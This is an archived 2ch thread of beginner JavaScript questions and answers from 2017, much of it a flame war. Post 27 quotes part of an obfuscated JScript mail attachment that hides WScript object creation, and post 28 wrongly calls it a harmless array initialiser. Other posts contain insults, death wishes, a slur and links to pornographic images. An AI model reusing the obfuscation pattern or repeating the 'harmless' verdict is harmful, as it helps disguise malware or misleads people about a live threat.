2ちゃんねる★スマホ版★■掲示板に戻る■全部1-最新50

JavaScript の質問用スレッド vol.132 [無断転載禁止]©2ch.net

1 :
2017/01/24(火) 22:42:44.11 ID:???
JavaScript を自ら学ぶ人のための質問スレッドです。
>>2-5のテンプレを読んだ上で質問してください。次スレは>>950>>2のテンプレ案(本スレで改善案があれば考慮)を元に立ててください
(前スレでワッチョイ化の提案がありましたが、Web制作板のSETTING.TXTでBBS_USE_VIPQ2が2以上でない為、使用できないようです)

■質問を書く上で
(1) 煽り、コード制作依頼等、人を不快にさせる投稿はご遠慮下さい。公序良俗を守った応対を心がけてください。
(2) 他の人に迷惑をかけるスクリプトの質問はご遠慮ください(ブラクラ、[戻る], [閉じる], [クリック] の妨害、画面占有など)。
(3) 質問者及び議論を行う人はメール欄を空欄にし、名前にレス番を入れることを強く推奨します。回答者はなりすましを判断できませんので、なりすましが現れても自己責任となります。
(4) 常に自発的に調べる心構えを持ってください。
  具体的には「自分で調べてから質問する」「回答をもらってわからない単語があればGoogle検索してみる」など。
  わからない内容を代わりに調べてくれる回答者をお望みの方は余所で質問してください。
(5) 出来るだけ一般的な用語を使用してください。脳内オレオレ用語は混乱の元です。
(6) 出来るだけサンプルコードを掲示してください。言葉による説明は行き違いが生まれる場合があります。
  ※必ず「問題の事象が再現されること」を確認してください。
   必要な部分だけ切り出したつもりで現象が再現できていなかったケアレスミスがしばしば見られます。
(7) サンプルコードに HTML が含まれる場合は http://validator.w3.org/ で [Check] してみてください。
(8) 質問を具体的かつ詳細に書くと回答を得られやすいです。>>2の質問テンプレートを活用してみてください。
(9) ライブラリ関連の話題は禁止です。関連スレにあるライブラリ質問スレで質問して下さい。
(10) 時にはあなたが望む「答え」だけでなく、「意見」などが寄せられる場合もあります。
2 :
2017/01/24(火) 22:44:04.21 ID:???
■質問テンプレート
【環境】OS, ブラウザをバージョンと共に記入してください。(ex: IE8, Firefox4)
【何をしたのか】何をしたら問題の現象が発生するのか。再現手順を具体的に書いてください。
【エラーメッセージ】エラーメッセージがあれば正確に書き写してください。(Windows なら「コピット」を活用)
【期待する結果】最終的にどういう結果を望んでいるのか、を書いてください。
【サンプルコード】現象を再現可能な最小限のコードを書いてください。
 1レスに収まらないならコード投稿サイトを利用してください。
 http://jsdo.it/ http://jsbin.com/ http://jsfiddle.net/ http://ideone.com/

■前スレ
JavaScript の質問用スレッド vol.131
http://echo.2ch.net/test/read.cgi/hp/1478053599/

■過去スレ全集
http://www2.atpages.jp/mirror/2ch/javascript/
http://usamimi.info/~mirrorhenkan/2ch/javascript/ (閲覧のみ)

■テンプレ案
http://fiddle.jshell.net/fH4cC/182/show/light/

■関連スレ
JavaScript の質問用スレッド vol.122
http://echo.2ch.net/test/read.cgi/tech/1472426483/
JavaScript(ECMAScript)質問用スレッド vol.122
http://echo.2ch.net/test/read.cgi/tech/1472401404/
JavaScript ライブラリ総合質問所 vol.5
http://echo.2ch.net/test/read.cgi/hp/1465399470/
jQuery 質問スレッド vol.7
http://echo.2ch.net/test/read.cgi/hp/1478055094/
3 :
2017/01/24(火) 22:45:02.86 ID:???
■FAQ
http://fiddle.jshell.net/vSqKr/44/show/light/

◆開発者ツール(Developer Tools)の基本的な使い方 (全部はhttp://fiddle.jshell.net/vSqKr/44/show/light/#Browser-Developer-Tools )
 ▼諸注意
  - 本説明では Google Chrome の開発者ツールの名称に従います。他ブラウザで使う場合は適宜読み替えて下さい。
  - IE9- でコンソールを使うには予め開発者ツールを起動しておく必要があります(開発者ツールを起動しないと console.log() が機能しません)
  - Safari はデフォルトで開発者ツールが無効な為、有効に設定する必要があります。
  https://developer.apple.com/library/safari/documentation/AppleApplications/Conceptual/Safari_Developer_Guide/GettingStarted/GettingStarted.html
 ▼要素を検証
 1. ページ上で右クリックして [要素を検証]
 2. [Elements] パネルが開き、対象のDOMノードが選択される(選択対象が目的の要素でなければ [Elements] パネル上で選択し直す)
 3. 右側のサイドバーから知りたいステータス名のタブを選択する
   - [Styles] タブ … CSSプロパティの指定値を表示 (※カスケードによって上書きされたプロパティは取り消し線で表示される)
   - [Computed] タブ … CSSプロパティの算出値を表示("font-size: 1em" を指定していても算出後の "*px" で表示される)
   - [Properties] タブ … 選択したDOMノードのプロパティを表示
 ▼コンソール
 1. JavaScript コード上で console.log('Hello, World!'); と入力
 2. [Ctrl] + [Shift] + [I] キー(IE は [F12])で開発者ツールを開き、[Console] パネルを開く
 3. [Console] パネルに "Hello, World!" と表示される
 (※window.alert() は String 型に変換されますが、console.log() は Object 型の中身をそのまま表示してくれます。)
4 :
2017/01/24(火) 22:46:09.59 ID:???
■FAQ(続き)
◆JavaScriptの実行速度
JavaScriptの速度は「ブラウザ名」「ブラウザのバージョン」「PCスペック」に依存します(ブラウザのバージョン毎に最適化具合が異なります)。
速度の疑問解消の為に http://jsperf.com/ にコードをUPしてブラウザ毎に速度計測する事を推奨します。
例外として、仕様における理論上の速度が明確になっている場合があります。
例えば、正規表現によるマッチング処理を考えた場合、「RegExp#test > RegExp#exec > String#match」は ES5 仕様で保証されています。
ES5 仕様において RegExp#test が最も処理数が少なく、String#match が最も処理数が多いことが明確だからです。
ブラウザによっては RegExp#test の最適化が十分でなく、String#match の最適化が RegExp#test より十分であれば逆転する可能性はありますが、各メソッドの最適化が一律であればこの前提が崩れる事はありません。

■各種仕様 ( http://fiddle.jshell.net/vSqKr/44/show/light/#Link も参照 )
◆ Standard ECMA-262
http://bclary.com/2004/11/07/ (ECMAScript 3 HTML版)
http://www2u.biglobe.ne.jp/~oz-07ams/2002/ecma262r3/ (ECMAScript 3 和訳)
http://www.ecma-international.org/ecma-262/5.1/ (ECMAScript 5.1 HTML版)
http://tsofthome.appspot.com/ecmascript.html (ECMAScript 5.1 和訳)
http://www.ecma-international.org/ecma-262/6.0/ (ECMAScript 6 / ECMAScript 2015)
http://kangax.github.io/compat-table/es5/ (ECMAScript 5 compatibility table)
http://kangax.github.io/compat-table/es6/ (ECMAScript 6 compatibility table)
◆ HTML Standard (HTML5)
http://www.whatwg.org/specs/web-apps/current-work/multipage/
http://momdo.s35.xrea.com/web-html-test/spec/WD-html51-20130528/Overview.html (HTML5.1 部分訳)
http://www.hcn.zaq.ne.jp/___/WEB/WebStorage-ja.html (Web Storage 和訳)
5 :
2017/01/24(火) 22:47:11.77 ID:???
■各種仕様 (続き)
◆ Document Object Model (DOM) / CSS Object Model (CSSOM)
http://www.hcn.zaq.ne.jp/___/WEB/DOM4-ja.html (DOM Standard (DOM4) 和訳)
http://www.w3.org/TR/DOM-Level-3-Events/ (DOM3 Events)
http://www.w3.org/TR/uievents/ (UI Events)
http://www.hcn.zaq.ne.jp/___/WEB/cssom-ja.html (CSSOM 和訳)
http://www.hcn.zaq.ne.jp/___/WEB/cssom-view-ja.html (CSSOM View Module 和訳)
◆ その他のWeb関連仕様
http://domparsing.spec.whatwg.org/ (DOM Parsing and Serialization - innerHTML等)
http://www.hcn.zaq.ne.jp/___/WEB/XHR-ja.html (XMLHttpRequest 和訳)
http://www.hcn.zaq.ne.jp/___/WEB/File_API-ja.html (File API 和訳)
http://www.whatwg.org/specs/ (WHATWGの仕様一覧)
◆ MDN (Netscape/Mozilla)
https://developer.mozilla.org/ja/docs
◆ MSDN Library
https://msdn.microsoft.com/en-us/library/ie/hh828809 (Internet Explorer API)
http://msdn.microsoft.com/ja-jp/library/yek4tbz0.aspx (JavaScript)
http://msdn.microsoft.com/ja-jp/library/cc427807.aspx (JScript)
http://msdn.microsoft.com/ja-jp/library/cc409712.aspx (DHTML)
◆ JavaScript Garden (ja)
http://bonsaiden.github.com/JavaScript-Garden/ja/
◆ JSON (JavaScript Object Notation)
http://www.json.org/json-ja.html

■諸注意
質問の要件に曖昧な点があれば質問者に補足要求して下さい。回答に対して訂正を求める行為は禁止ではありませんが、節度ある態度でお願いします。

vol.115でlodashを不必要に推奨して啓蒙する行為が多く確認されており、ライブラリ系の話題はvol.116から禁止されました。
vol.115,116ではライブラリ禁止する発言が見られた直後にライブラリを許可する意図で次スレを立てる行為が確認されています。
本スレッドでライブラリ許可を求める発言が確認された場合は不要な争いを避ける為、スルーすることを推奨します。
ライブラリの話題はライブラリスレへ誘導し、誘導行為への反論はスルーしてください。
6 :
2017/01/24(火) 22:49:55.60 ID:???
テンプレ終了。

■次スレのテンプレ
http://fiddle.jshell.net/fH4cC/183/show/light/
7 :
2017/01/24(火) 22:50:51.94 ID:???
8 :
2017/01/25(水) 01:27:54.24 ID:???
age
9 :
Name_Not_Found
2017/01/25(水) 23:48:04.13 ID:epcHDesv
<script>で質問です
<body onload="function()">や、
</html>の下に<script>を記述するサイト

を見かけます

未だにたまに見かけるんですが、なんででしょうか
10 :
2017/01/26(木) 13:24:39.63 ID:???
<body onload='function()'>は、DOMレベル0から使える表記方法

addEventListener は、DOMレベル2・IE9からしか使えない。
IE8までは、attachEvent を使っていた。
まあ互換性については、jQueryを使えば、自動的に判断してくれる

</html>の下に<script>を記述するサイトは、閉じタグで、DOMの構築が済んでいるから、
そこにDOMをいじるコードを書いても、安全だから

</body>の直前で、JSコードを読み込ませる方法もある
11 :
2017/01/26(木) 13:30:23.53 ID:???
>>10
おー、なるほど。古いブラウザに配慮した書き方なのですね
ありがとうございます
12 :
2017/01/26(木) 20:21:59.43 ID:???
>>11
> 古いブラウザに配慮した

そうではない。古いブラウザに配慮するだけならば
他にもっといいやり方がある。
13 :
Name_Not_Found
2017/01/27(金) 00:13:36.21 ID:yVLAI7k9
forで処理を実行した後にi=i+1するけどiの初期値が0だとしたらi=0+1になってi=1になるけ左辺のiと右辺のiは別なんでしょうか?そこがいまいち分かりません
14 :
2017/01/27(金) 00:55:14.04 ID:???
i = i + 1;

i は同じオブジェクト・プリミティブ

1. 先に右辺のiが参照される
2. 右辺の式を評価する
3. 評価した値を、左辺のiに代入する
15 :
2017/01/27(金) 01:46:53.66 ID:???
>>13
JavaScriptにおいて「=」は同じを意味する記号ではない
代入といおう意味の記号。同じという意味の記号は == や ===

プログラムは一般的に上から下へ、左から右へと実行されていくが、
i = i + 1 は逆。i + 1 を実行してから i に代入する

i (変数)というのは箱みたいなもの。
i = i + 1 というのは、iという箱から数値を取り出して
1を加えてから、同じ箱に戻すという動きをしている。



最後に一言煽っておくが、
>>13のような質問をする人はオブジェクト・プリミティブなんて
言っても意味がわからないし、参照や評価という言葉も知らない。
知っていたらこの質問内容は理解できているはず。
16 :
2017/01/27(金) 08:47:01.05 ID:???
vbaから来ると=を等号と捉えてしまうんだよね
俺がそうだった
17 :
Name_Not_Found
2017/01/27(金) 19:48:19.80 ID:NmTAjg2s
googlemapAPIのマーカーを押したときにajaxでデータを取りに行きたいのですが
イベントをセットする段階でデータを取りに行ってしまいます。
意図したタイミングでデータをとりにいくにはどうしたらいいでしょうか?



google.maps.event.addListener(markers[i], 'click',getikisakidat(apn);


function getikisakidat(apn) {


var txtList;

$.ajax({

url: 'ikisaki/' + apn + '.txt',
success: function(ikidat) {

// csvを配列に格納
txtList = $.csv()(ikidat);


}
});


}
18 :
2017/01/29(日) 10:04:43.21 ID:???
質問です
javascriptでメーラーを起動せずにウェブ上から任意のアドレスへフォーム等に
入力された情報を送信するにはどうしたら良いでしょうか?
19 :
2017/01/29(日) 10:19:55.67 ID:???
>>18
jsだけでメールは無理
phpかcgiが必要。そのページがあればajax+jsでもできるけど、やってることはsubmitと変わらん
20 :
2017/01/29(日) 10:55:08.66 ID:???
>>19
ありがとうございます
無知で申し訳ないのですがgmailなどのAPIを使う、とかでも無理でしょうか
21 :
2017/01/29(日) 11:01:33.19 ID:???
知らんwww
あるかもしれんがそれも
>phpかcgiが必要。そのページがあればajax+jsでもできるけど、やってることはsubmitと変わらん
と根本的には同じ事
22 :
2017/01/29(日) 11:25:20.04 ID:???
>>20
ドキュメントを読んでみたら?
https://developers.google.com/gmail/api/quickstart/js?hl=ja
23 :
2017/01/29(日) 11:29:03.96 ID:???
そこまでしてjsでメール送りたい理由とは
はっきり言ってかなりめんどくさいことをやろうとしているぞ
24 :
2017/01/29(日) 11:36:51.04 ID:???
つーかjsじゃメアド丸出しになると思うんだが
25 :
2017/01/29(日) 12:36:05.30 ID:???
用途は架空請求か?
26 :
2017/01/29(日) 12:40:43.37 ID:???
あぁ、jsならページ踏ませるだけでメール発射装置にできるからかw
考えるね〜
27 :
Name_Not_Found
2017/01/29(日) 12:44:05.24 ID:/bEqw6wS
知らないところからメールが来て、jsファイルの添付ファイルがあった。
これって何を狙っているんだろうか。

一部抜粋すると、

var qyfunuvri0 = ['qikerka', WScript][1][["xcaxyf", "baqitvy", "octanalc",
["ucfijga", "ybgyfa", "ltaw", "obe", "Cre"][4], "vatytbu", "ujokd", "ysipyl",
"ejbyvwo", "iryb", "ije", "umer", "ptyqozw", "nryfb", "ifwa", "xvuqo", "afzovfibq",
"avexoq", "bowsax"][3] + ["mgovirry", "bubveld", "esuk", "wkija", "ulwixex",
"errocy", "pkyrfuzk", "ltarsa", ["enkigu", "yfozzolv", "cliky", "pxidd", "ate"][4],

, "ylaqh", "imo"][13])()][20]) {
bhirojxy1 = this[["ufgapu", "apo", "utajquth", "glorohku",
"uxurbo", "kroxotv", "ebwe", "tjebxi",

こういうのが続いている。
28 :
2017/01/29(日) 12:55:30.33 ID:???
>>27
ただの配列初期化子
29 :
Name_Not_Found
2017/01/29(日) 13:00:03.44 ID:/bEqw6wS
>>28
レスありがとうございます。
怖いコードではなさそうですか。

悪意があるとしたら、単に配列を初期化するだけでは済まなさそうだから、
メーラーをクラッシュさせるとか可能性があるかもかな。
30 :
2017/01/29(日) 15:11:46.27 ID:???
JavaScript ベスト・オブ・ザ・イヤー 2016
https://risingstars2016.js.org/ja/

JavaScriptコミュニティは日々進化しています。今日のトレンドも数か月後には陳腐化しているなんてことは日常茶飯事です。

2016年は終わってしまいましたが、何か重要なことを見逃したのではないかと感じているそこのあなた! 2016年の主要なトレンドをおさらいして、そんな不安を払拭しちゃいましょう。

過去12か月に獲得された Github のスター数を比較して、2016年に支持を集めたプロジェクトを数値に基づいて評価していきます。

2015年はなんといっても React でした。そして、Flux 実装を席巻したのは Redux でしたね。 2016年、JavaScript の人気プロジェクトはどのようなものだったのでしょうか?
31 :
2017/01/29(日) 15:22:25.31 ID:???
> 過去12か月に獲得された Github のスター数を比較して

全スターの合計じゃない? 最近話題になったのが増えるだけじゃん
はい意味ない、さよなら
32 :
2017/01/29(日) 15:27:33.97 ID:???
>>21
ありがとうございます
すみません良く分かっていなかったです

>>22
ありがとうございます!読んでみましたがイマイチよく分からず・・・

>>23
e-mail:

message:

[post]

とあったとして、postボタンを押すとmessageに入力された文章がサイトに投稿され、
e-mailに入力された文章(アドレス)が自分のところのメールボックスに送られてくる

という機能を作りたかったのです。それで1つのボタンでワンタッチでできるにはjavaで
やるしかないのかと考えていた次第です
33 :
2017/01/29(日) 15:31:02.32 ID:???
>>30
そこで紹介されている下のほうがまともなデータだな
http://stateofjs.com/2016/introduction/

例えば、フロントエンドフレームワーク
http://stateofjs.com/2016/frontend/
Vueなんて全く使われてなくて
ReactがVueの5倍、Angularが3倍使われてる

テスト
http://stateofjs.com/2016/testing/
当然のごとくMochaやJasmineが一番使われてる。
Ava?Jest?なにそれw
34 :
2017/01/29(日) 15:35:40.97 ID:???
>>32
マルチ

ホリエモン、マシン語を使えるスーパープログラマーだった [無断転載禁止]©2ch.net [418558609]
http://hitomi.2ch.net/test/read.cgi/poverty/1485645604/

202 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウオーT Sa92-Hx4G)[] 投稿日:2017/01/29(日) 09:53:26.15 ID:v8CV8LRGa [1/3]
パソコンの大先生がいることを願って聞きたいんだが
WEBアプリでフォームに入力された情報を一つのボタンで複数の処理をするには
どうすればいいのでしょうか

例えば

e-mail:

message:

[post]

とあったとして、postボタンを押すとmessageに入力された文章がサイトに投稿され、
e-mailに入力された文章(アドレス)が自分のところのメールボックスに送られてくる

という風にしたい
もしお分かりになる方がいらっしゃいましたらお教え願います

242 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウオーT Sa92-Hx4G)[] 投稿日:2017/01/29(日) 10:14:19.30 ID:v8CV8LRGa [2/3]
>>217
ありがとう
jsでやるとメール送信するのにメーラー起動されるっぽいから避けたいんです
できるだけ一回の動作で簡潔したいので・・・
サーバーと分けるというのはCGI使ってやるってことですか?
質問ばっかですみません
35 :
2017/01/29(日) 15:38:07.14 ID:???
>>30もマルチ
36 :
2017/01/29(日) 15:40:19.90 ID:???
>>35
マルチって言っても質問じゃねーだろ。情報共有だ。
有益な情報は貼れよ。
37 :
2017/01/29(日) 15:54:32.70 ID:???
コピペ荒らしの自覚がないのかw
38 :
2017/01/29(日) 15:55:22.77 ID:???
>>37
荒らすなよカス死ね
39 :
2017/01/29(日) 15:57:34.71 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれましたw
私もそれを支持しますwwww
40 :
2017/01/29(日) 16:00:21.88 ID:???
>>39
草生やすなコピペガイジ
41 :
2017/01/29(日) 16:00:58.55 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれました笑
私もそれを支持します笑笑笑笑
42 :
2017/01/29(日) 16:01:45.35 ID:???
>>39
お前何の情報も貼らないし糞みたいな質問するだけじゃん
43 :
2017/01/29(日) 16:02:05.68 ID:???
>>41
コピペガイジ必死w
44 :
2017/01/29(日) 16:02:27.94 ID:???
泣くなよwww

41 名前:Name_Not_Found[sage] 投稿日:2017/01/29(日) 16:00:58.55 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれました笑
私もそれを支持します笑笑笑笑
45 :
2017/01/29(日) 16:02:51.45 ID:???
どうしたクズ家族まとめて死ねや
46 :
2017/01/29(日) 16:05:09.99 ID:???
どうした?俺死んでないぞ?
残念、お前の願いは叶いませんでしたwww
47 :
2017/01/29(日) 16:06:27.38 ID:???
何で自分だと思ったん?
48 :
2017/01/29(日) 16:07:53.55 ID:???
情報共有は嫌いじゃないけど、質問スレで情報共有は邪魔
さすがにこれは>>36が悪い
49 :
2017/01/29(日) 16:08:20.43 ID:???
「死ね」に対して「死んでないぞ」っておかしいだろ
「死なないぞ」ならわかるけど「死んでないぞ」ってなんで過去形なんだよ
頭悪そう
50 :
2017/01/29(日) 16:09:10.34 ID:???
>>48
コピペガイジ荒らし乙
51 :
2017/01/29(日) 16:10:08.96 ID:???
>>49
正論だけどそろそろやめてくれ

>>50
と言われても俺も貼るけどなw
ありがたく読んでくれ
52 :
2017/01/29(日) 16:10:19.61 ID:???
>>48
このスレ質問スレだから質問とその回答以外書き込むなよ死ね
53 :
2017/01/29(日) 16:11:29.82 ID:???
もうそろそろ気づいたかね? お前のせいで荒れたんだよ
お前がいくら有益だと思った所で他の人はそうは思ってないし
他の人からすればマルチでしかなく邪魔なだけなんだよ
54 :
2017/01/29(日) 16:12:20.52 ID:???
情報共有するわ
http://i.imgur.com/vggwkG7.gif
55 :
2017/01/29(日) 16:13:06.91 ID:???
>>53
人のせいにすんなスルーしろお前が邪魔じゃボケ
56 :
2017/01/29(日) 16:13:42.61 ID:???
↑グロはいらん
57 :
2017/01/29(日) 16:14:05.48 ID:???
>>53
同意。ワッチョイつけない>>1の責任
58 :
2017/01/29(日) 16:14:39.44 ID:???
こっちのスレはいつもどおり荒れてるな
59 :
2017/01/29(日) 16:15:51.40 ID:???
じゃあ質問してやるよ

いちばんすごいジャバスクリプトのコードをおしえてください
一番すごくてつよいやつです
60 :
2017/01/29(日) 16:16:35.63 ID:???
>>53
お前がレスしなければ荒れなかったけどな
61 :
2017/01/29(日) 16:17:24.64 ID:???
ム板より遥かにレベルが低い板だから仕方ないね
62 :
2017/01/29(日) 16:17:31.79 ID:???
>>60
どうせ他の誰かがしてる
63 :
2017/01/29(日) 16:18:17.59 ID:???
>>62
責任転換すんな
64 :
2017/01/29(日) 16:18:54.16 ID:???
http://imgur.com/LaZnNvo.jpg
http://imgur.com/5GEcIdr.jpg
http://imgur.com/C4xpEjy.jpg
この人の描くパイズリ好きなんだか如何せん作品数と流通量が少なすぎる
65 :
2017/01/29(日) 16:20:33.90 ID:???
>>64
弾力感はすごいけどパイズリ自体そんなに好きじゃないからなんとも
66 :
2017/01/29(日) 16:20:35.77 ID:???
>>63
誰のせいにもしてないから責任転嫁ではない
67 :
2017/01/29(日) 16:22:17.73 ID:???
世間的には http://www.xvideos.com/ が有名だと思うけど、
http://www.thisav.com/ もなかなかマイナーなものがあって捨てがたい
68 :
2017/01/29(日) 16:24:49.37 ID:???
>>66
してるだろ、お前が誰かぶんなぐって
「あいつめっちゃ性格悪いからおれが殴らなくてもほかのやつが殴ってる」
って言ってるようなもんだろ
お前が殴ったんだからお前のせいだろ
69 :
2017/01/29(日) 16:25:14.12 ID:???
70 :
2017/01/29(日) 16:26:47.59 ID:???
>>68
つまりお前が書き込みしなければ
あれなかったってことだよ
71 :
2017/01/29(日) 16:27:31.02 ID:???
コピペしておいて、
お前がスルーしていれば荒れなかった
責任転嫁の何者でもないだろw
72 :
2017/01/29(日) 16:28:16.31 ID:???
>>65
現実のパイズリは全然気持ちよくないからな
73 :
2017/01/29(日) 16:28:32.68 ID:???
>>71
責任転換すんなや
74 :
2017/01/29(日) 16:28:49.60 ID:???
>>70
うるせー謝れ!
75 :
2017/01/29(日) 16:31:10.43 ID:???
質問スレで低レベルな質問に答えることに時間使ってるやつは成長しないよ
そんな時間があったら自分の技術を磨いた方がいい

質問に答えることで考えるきっかけになるとか
復讐になるなんて思ってるやつはいつまで経っても低レベル

もちろんお金をもらって仕事で質問に答えるのはいいと思うけどね

さっさとこのスレから去るのが自分のためだな
76 :
2017/01/29(日) 16:32:48.57 ID:???
>>72
それはすごい巨乳でテクの人にやってもらったことないからでは?
77 :
2017/01/29(日) 16:33:40.81 ID:???
コルトピみたいに貴重な能力だけど戦闘力低い奴どうすんだよ
78 :
2017/01/29(日) 16:35:41.87 ID:???
>>75
じゃあさっさと去れよ
79 :
2017/01/29(日) 16:36:37.78 ID:???
>>78
ちょっと待ってよー
もうちょいいさせてよー
スマンね
80 :
2017/01/29(日) 16:37:09.94 ID:???
真面目な会話をしたい人はこちらへどうぞ

+ JavaScript & jQuery 質問用スレッド vol.7 + [無断転載禁止]©2ch.net
http://echo.2ch.net/test/read.cgi/hp/1478002550/
81 :
2017/01/29(日) 16:37:49.13 ID:???
>>80
情報共有のためにURL貼るのは禁止だよ
82 :
2017/01/29(日) 16:38:28.67 ID:???
それは情報共有じゃないからOK
83 :
2017/01/29(日) 16:39:01.49 ID:???
何で>>32はjsでやろうとしてるん?
84 :
2017/01/29(日) 16:39:14.72 ID:???
>>81
× 情報共有のためにURL貼るのは禁止だよ
○ 情報共有のためにコピペするのは禁止だよ

コピペを正当化しようとするな
85 :
2017/01/29(日) 16:39:54.09 ID:???
>>83
jcはオバン
jsの方が可愛いから
86 :
2017/01/29(日) 16:41:32.01 ID:???
>>82
ダメだよ「真面目な会話をしたい人はこちらへどうぞ」というURLという
情報を共有するための書き込みだからね

質問と回答以外は禁止だよルール守ろうな
87 :
2017/01/29(日) 16:42:11.09 ID:???
>>84
責任転換すんなやお前のせいで荒れたんだろ
88 :
2017/01/29(日) 16:42:17.91 ID:???
>>86
だめなのはマルチ

マルチは指摘される
これらをみよ

34 名前:Name_Not_Found[sage] 投稿日:2017/01/29(日) 15:35:40.97 ID:???
>>32
マルチ

35 自分:Name_Not_Found[sage] 投稿日:2017/01/29(日) 15:38:07.14 ID:???
>>30もマルチ
89 :
2017/01/29(日) 16:43:21.04 ID:???
>>32
PHP簡単だよ
そのレベルの簡単なことやる初心者におすすめ
90 :
2017/01/29(日) 16:44:27.18 ID:???
>>88
マルチすんなよ見つけたぞ死ね
http://mercury.bbspink.com/test/read.cgi/mature/1453570688/23
91 :
2017/01/29(日) 16:44:56.20 ID:???
>>88
よくマルチしておいて人のこと言えるなお前
92 :
2017/01/29(日) 16:45:31.76 ID:???
>>88
マルチじゃないというなら証拠を提示してみろや
まず手始めにfushianaしろ
93 :
2017/01/29(日) 16:45:46.40 ID:???
>>88
どうしたこの野郎にげんじゃねーぞ
94 :
2017/01/29(日) 16:47:08.00 ID:???
マルチ禁止って規約のどこに書いてあるんだ?
95 :
2017/01/29(日) 16:48:37.12 ID:???
ttp://www.dotup.org/uploda/www.dotup.org1138859.jpg_nzR0BFmsVWTqgiyO0vMn/www.dotup.org1138859.jpg
96 :
2017/01/29(日) 16:49:44.18 ID:???
>>89
jsスレだからjsだけで実装するのがこのスレの仕事だろ
97 :
2017/01/29(日) 16:51:36.90 ID:???
逃げてんじゃねーよマルチ野郎
意味不明なスレでマルチしてんじゃねーぞハゲが
98 :
2017/01/29(日) 16:55:51.70 ID:???
質問者はこちらへどうぞ。
ワッチョイ付きなので荒らしの区別が付きやすいと思われます。

+ JavaScript の質問用スレッド vol.122 +
http://echo.2ch.net/test/read.cgi/tech/1472426483/
99 :
2017/01/29(日) 17:02:06.88 ID:???
>>98
またマルチで誘導してんのか
ほんとマルチすんなとかいいつつ自分はマルチして最低だなお前
http://echo.2ch.net/test/read.cgi/hp/1478002550/100
100 :
2017/01/29(日) 17:12:41.94 ID:???
マルチというより、架空請求者だろ?w
101 :
98
2017/01/29(日) 17:19:52.76 ID:jSlaNRsk
>>99
私ではありませんし、言いがかりですね。
憶測で非難していいならコピペされてからたった1分で見つけて指摘するあなたがなりすましではないかと疑いたくなるところですが(なりすましが怖いのでID出します)。

マルチポストは最低ですが、執拗にスレに張り付いて誰彼かまわずかみつく人も最低だと思います。
102 :
2017/01/29(日) 17:29:17.23 ID:???
>>101
だったら>>30がマルチってのも言いがかりだろ
憶測で非難して>>35とか最低だな
103 :
2017/01/29(日) 17:37:35.74 ID:???
>>72
ローション使わないと痛いよな
あと「そこでやらんでも・・・」感がすごい
104 :
2017/01/29(日) 17:38:19.77 ID:???
>>96
無理な事に対する代替案はいいだろう
105 :
Name_Not_Found
2017/01/29(日) 18:01:29.57 ID:C5kZvbfw
>>101
ageんじゃねーよ荒れるだろ
106 :
2017/01/29(日) 18:08:27.32 ID:???
>>104
node.jsでできるだろ
107 :
2017/01/29(日) 19:34:43.37 ID:???
>>83
JSじゃないとできないのかと思ってました

>>89
ありがとうございます。今の私には一番入口として良さそうなのでまずはPHPで
やってみます!みなさんありがとうございました
108 :
2017/01/29(日) 19:37:18.12 ID:???
>>107
それな、jsだとめっちゃムズイ。phpだとチョー簡単
サンプルも死ぬほどあるから直ぐにできると思うよ。ガンバレー
109 :
Name_Not_Found
2017/01/29(日) 22:08:24.64 ID:jSlaNRsk
>>102
それも私ではないのですが。
憶測で同一認定されても困ります。
110 :
2017/01/30(月) 00:49:56.18 ID:???
>>109
そんなこと言ってないから
日本語理解しろ
111 :
2017/01/30(月) 01:57:56.36 ID:???
日曜日のレスをちんたら読んでたら
よく見たら100突破してて吹いた
アホかお前ら
112 :
Name_Not_Found
2017/01/30(月) 02:02:13.61 ID:XAxgtG6P
>>110
>35は言いがかりかもしれませんが、私には無関係なのでその話は無意味です。
>>102は自己弁護にもなってませんし、ただ話をずらしにかかっているだけでしょう。
113 :
Name_Not_Found
2017/01/30(月) 10:45:50.91 ID:08nQ7DUE
114 :
2017/01/30(月) 11:22:07.26 ID:???
var increment = 0;
var result = 0;
for (var i = 0; i < 10; i++) {
increment += 0.1;
result = 0.1 + increment;
console.log(increment, result);
}
ふと気付いたので質問します
0.1 + 0.2 = 0.3 のはずですが、
実際には0.30000000000000004になります
これは正常なのでしょうか?
宜しくお願いします
115 :
Name_Not_Found
2017/01/30(月) 11:53:40.04 ID:XAxgtG6P
>>114
0.1+0.1+0.1 === 0.30000000000000004 は IEEE754 の浮動小数演算精度の仕様です。
厳密に演算したいなら整数演算する必要があります。
(0.1*10+0.1*10+0.1*10)/10 === 0.3
116 :
2017/01/30(月) 11:57:51.63 ID:???
浮動小数点数に面食らうのは誰もが通る道
117 :
2017/01/30(月) 12:30:19.64 ID:???
>>115
ありがとうございます
その辺りを勉強してみます
ちなみに Math.round((0.1+0.2)*10)/10 でも大丈夫ですか?
118 :
2017/01/30(月) 13:08:44.90 ID:???
>>27
それ WScript.Createなんとか が実行されちゃうんじゃないかな

たとえば
var foo = ['a', console][1][['b', 'lo'][1] + ['c', 'g'][1]](['d', 'test'][1]);
とかすると、console.log('test'); と同等だけどそんな感じで隠していると思う
119 :
2017/01/30(月) 15:13:12.79 ID:???
>>112
マルチすんなキチ
120 :
2017/01/30(月) 15:33:46.05 ID:???
121 :
2017/01/30(月) 15:50:51.96 ID:???
>>120
詳細
122 :
2017/01/30(月) 16:08:56.88 ID:???
ある<table>の直下の<tbody>にappendChild()で追加しまくった<tr>を消したいとき
<tr>はイベントリスナを一切触っていない前提だと

・<tbody>のinnerHTMLを空文字列にする
・removeChild()でひとつずつ消していく

この2つの方法で結果に違いはありますか?
123 :
2017/01/30(月) 16:22:19.07 ID:???
ないんじゃね 速度は違うと思うが

つかtbodyをremoveすればよくね
124 :
2017/01/30(月) 16:50:35.97 ID:???
>>122
var target = document.getElementsByTagName('tbody');
while (target.firstChild) target.removeChild(target.firstChild);
125 :
Name_Not_Found
2017/01/30(月) 17:06:11.28 ID:VseG2LWP
>>119
日本語の不勉強乙
126 :
2017/01/30(月) 18:04:23.58 ID:???
>>125
荒らすなよゴミ
127 :
2017/01/30(月) 18:52:11.19 ID:???
>>121
COMIC 夢幻転生 2016年9月号 世徒ゆうき「ラズベリーinc.」
128 :
2017/01/30(月) 19:10:18.84 ID:???
>>120
妹の方がかわいくないかこれ
129 :
2017/01/30(月) 21:20:29.03 ID:???
こんな痴女みたいな服着てるやついないやろ
130 :
